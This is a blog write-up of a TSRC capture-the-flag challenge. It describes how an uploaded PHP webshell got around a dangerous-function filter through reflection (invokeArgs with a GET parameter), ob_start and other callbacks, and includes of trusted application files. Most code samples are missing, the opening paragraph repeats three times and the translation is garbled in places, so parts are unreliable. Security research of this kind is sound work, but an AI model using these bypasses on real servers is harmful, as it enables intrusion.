TSRC challenge: PHP defense bypass challenge recording

Some time ago, I was lucky enough to participate in a Challenge initiated by TSRC. A normal discuz application is running in the target environment, and an upload interface exists. This interface allows you to upload arbitrary files, but limits most dangerous PHP functions, such as system, scandir, and eval. A flag file is placed on the server, which is located through the uploaded PHP file.

Some time ago, I was lucky enough to participate in a Challenge initiated by TSRC. A normal discuz application is running in the target environment, and an upload interface exists. This interface allows you to upload arbitrary files, but limits most dangerous PHP functions, such as system, scandir, and eval. A flag file is placed on the server, which is located through the uploaded PHP file.

Some time ago, I was lucky enough to participate in a Challenge initiated by TSRC. A normal discuz application is running in the target environment, and an upload interface exists. This interface allows you to upload arbitrary files, but limits most dangerous PHP functions, such as system, scandir, and eval. A flag file is placed on the server. The target is to find the flag file through the uploaded PHP file.

After all, this is a competition, and there will be generous rewards before the rank test. According to the rules, the same method of exploits is calculated based on the first submitted score. As the saying goes, the first step is strong, so after the challenge begins, I will immediately come up with a secret weapon that I have treasured for many years-PHP reflection. For details, refer:

Http://cn2.php.net/manual/en/reflectionfunction.invokeargs.php.

The simple method is as follows:

 invokeArgs(array("$_GET[c]"));?>

The above php code is equivalent

The first victory! The first shell is successfully uploaded and the flag file is found on the target server smoothly. We scored 5 points.

After the big moves are completed, the rest of the day will be difficult.

The first thought was to use various variants to quickly track 72 changes of Sun monkey. After a few days, there is still no progress.

At this time, I began to reflect on how the call detection of dangerous functions was implemented? If the function is detected at the function implementation layer, no matter how deformation occurs, it will be the same way. It makes no sense to continue to change.

Back to the previous use of ReflectionFunction, successfully executed the system function, which strongly demonstrates that there is not only one way to access the system function.

In addition to reflection, another way php provides to indirectly call a function is callback. Here ob_start is used. For details, refer to: http://www.php.net/manual/en/function.ob-start.php

Simple use:

The above code is equivalent

In this way, the second inspection of dangerous functions is successfully bypassed and the command is successfully executed.

There are many other functions that support callback in php, such
Array_map, array_filter, array_reduce
Usort (), uksort ()
Array_walk () and so on

For example, @ BlackYe uses the array_diff_ukey that supports callback.

Multiple Functions related to xml parsing also support callback, but the first parameter passed to the callback function is the xml parsing object, which is not suitable for use scenarios.

The preceding two different implementations in PHP achieve the purpose of calling the system function to execute system commands. Because the system function in PHP is not directly used, this bypasses the inspection of the protection system, the system command is successfully executed.

Is there any third way to bypass it?

To bypass it, you must find out how it is implemented (or what method will be used if you implement such a system yourself ).

Next we need to make assumptions through conjecture and gradually verify our own ideas.

1. Some preparations have been made in the early stage to facilitate operation and verification. Because the file names after each upload are different, that is, several PHP scripts containing common functions are created using the fixed directory uploaded to the server. It generally includes:

1) copy. php is used to copy and move files;
2) SQL. php is used for database operations;
3) read. php is used to read the file content. It is mainly used to confirm whether the content of the uploaded file is correct;
4) stat. php is used to obtain the user and read/write permissions of files or directories;
5) shell. php is used to call other php functions.

2. After preparing these tools, start to guess the detection principle.

Question 1: Are dangerous functions allowed to be executed related to the directory where the file is located?

Because the directory of the uploaded file is fixed, you should first determine whether it is related to the directory. Therefore, using the previously uploaded PHP tools, you can find the writable directory under the directory where the WEB application is running normally and move the uploaded PHP file to this directory. The result ends with a failure.

Question 2: Is there a whitelist set, and dangerous PHP functions cannot be executed for subsequent uploaded files?

Write the shell into an existing file of the WEB application. Win the background and write the shell to the existing code file of the WEB application. The result still failed.

Question 3: if some functions are disabled, will the applications already set up be affected?

I did some auditing on the application code, found the code section using the disabled PHP function, and found that the function is not affected.
Impact. That is to say, the existing code on the server has not been modified and runs properly. Dangerous functions are disabled for newly uploaded or modified files.

Question 4: What is the difference?

Use the prepared script stat. php to list the permissions for uploading php files and new php files.

Question 5: Does the Server check the dangerous functions in PHP functions to determine whether the PHP file that calls these functions is the owner?

Method 1:
For example, if B. php include a. php code exists in the code of the installed WEB application, write the shell into a. php and access B. php of the WEB application,
The shell code written in a. php is not executed.
Indicates that the owner of the file is a file that directly calls dangerous functions.

Method 2:
Upload a. php file through the upload portal. In a. php file, destroy Deb. php and B. php are the existing Code of the WEB application and call dangerous functions (such as system ).
The Code is as follows:

The execution is successful and the score is 5 again.

I am here to share some of my experience on how to bypass defense in this challenge. If you have any questions or suggestions, please contact TSRC white hat snowman. We look forward to more opportunities to participate in this competition in the future.

This article from: http://yangqijun.com, original address: http://yangqijun.com/archives/298, thanks to the original author to share.